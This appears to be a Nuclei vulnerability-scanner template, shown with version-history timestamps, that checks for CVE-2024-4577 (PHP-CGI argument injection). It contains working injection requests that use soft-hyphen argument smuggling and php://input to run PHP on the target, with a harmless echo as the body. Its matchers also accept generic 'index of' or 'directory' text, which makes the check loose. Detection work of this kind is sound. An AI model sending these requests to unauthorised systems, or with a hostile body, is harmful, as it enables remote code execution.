2024-06-07 15:28:59 +00:00
id : CVE-2024-4577
info :
name : PHP CGI Argument Injection Vulnerability
author : securityforeveryone
severity : high
description : |
CVE-2024-4577 is a critical vulnerability in PHP affecting CGI configurations, allowing attackers to execute arbitrary commands via crafted URL parameters.
reference :
- https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/?123
- https://github.com/TAM-K592/CVE-2024-4577/tree/main
tags : rce,php,cgi,cve2024,cve
http :
- raw :
- |
POST /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
<?php echo "vulnerable"; ?>
- |
POST /php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
<?php echo "vulnerable"; ?>
matchers-condition : and
matchers :
- type : word
words :
2024-06-07 15:36:04 +00:00
- "index of"
- "directory"
- "vulnerable"
2024-06-07 15:28:59 +00:00
condition : or
- type : status
status :
- 200
